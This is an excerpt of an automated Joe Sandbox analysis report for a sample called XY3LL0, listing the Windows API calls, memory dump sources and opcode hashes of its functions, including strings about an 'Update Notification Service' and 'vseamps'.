                                                                                              • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                                              • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                                              • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                                              • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                                            • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                                            • String ID: vseamps
                                                                                            • API String ID: 3197017603-3944098904
                                                                                            • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                            • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                                            • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                            • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Messagesprintf_s
                                                                                            • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                                            • API String ID: 2642950106-3610746849
                                                                                            • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                            • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                                                            • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                            • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3859560861-0
                                                                                            • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                            • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                                                            • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                            • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3859560861-0
                                                                                            • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                            • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                                                            • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                            • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                                                            APIs
                                                                                            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                                            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                                            • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 319667368-0
                                                                                            • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                            • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                                                            • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                            • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                                                            APIs
                                                                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                                              • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                                            • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 1390108997-0
                                                                                            • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                            • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                                                            • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                            • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 3523768491-393685449
                                                                                            • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                            • Instruction ID: 6c3b0907c4733b37e3b163070ed4c5bd4a44bc09ecf8fe361c5a58f2ae8dc713
                                                                                            • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                            • Instruction Fuzzy Hash: 92E1B233D087828EE711AF24D840AAD37A0FB657A8F144136DB6E47795EF38E581C782
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF995CB
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF99601
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF9962E
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF9963F
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF99650
                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF8FDF98BC9,?,?,?,?,00007FF8FDF98C14), ref: 00007FF8FDF9966B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2506987500-0
                                                                                            • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                            • Instruction ID: 48ed77eb66c4089cb7dd65bf02b0bb453804b5748620e9098dc8bf3c56d2dcf8
                                                                                            • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                            • Instruction Fuzzy Hash: 74118C22F0C2424EFB1867225D919792192DFA87F0F455335EB3F4B6D6FE2CA4418682
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                                            • String ID:
                                                                                            • API String ID: 3326452711-0
                                                                                            • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                            • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                                                            • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                            • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                            • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                                            • API String ID: 2984211723-1229430080
                                                                                            • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                            • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                                                            • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                            • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                            • Instruction ID: 1789af6cd5df49b8733819a301d2b35033ee5c2e6d48a4171d789643c2826bd6
                                                                                            • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                            • Instruction Fuzzy Hash: 8FF0A422B1870289EB148B24A844B796360EF547F4F441235CB7F455E8EF2CD045D3C0
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                                            • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                                            • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExitHandleModuleProcProcess
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 75539706-1276376045
                                                                                            • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                            • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                                                            • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                            • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer
                                                                                            • String ID:
                                                                                            • API String ID: 1740715915-0
                                                                                            • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                            • Instruction ID: 45b8669fff560f36b57641c45f5465d5eeb49015c87abaf566b3a8cc62157e25
                                                                                            • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                            • Instruction Fuzzy Hash: 20B1A023E0A64689EB65DB559940E386390FF74BE4F098435DF6E07BC5EE2CE481C386
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInfoSleepStartupType
                                                                                            • String ID:
                                                                                            • API String ID: 1527402494-0
                                                                                            • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                            • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                                                            • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                            • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 3078728599-0
                                                                                            • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                            • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                                                            • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                            • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                            • String ID:
                                                                                            • API String ID: 1850339568-0
                                                                                            • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                            • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                                                            • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                            • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: _set_statfp
                                                                                            • String ID:
                                                                                            • API String ID: 1156100317-0
                                                                                            • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                            • Instruction ID: 303489927459c5bf98b78fffeae21cf6fab512598117ca592aff491d10e3381c
                                                                                            • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                            • Instruction Fuzzy Hash: 4C1186F3E18A0709F7581D14E966B791041EFB83F4F140734E77F063DAAE2CA8844182
                                                                                            APIs
                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996A3
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996C2
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996EA
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996FB
                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF9970C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
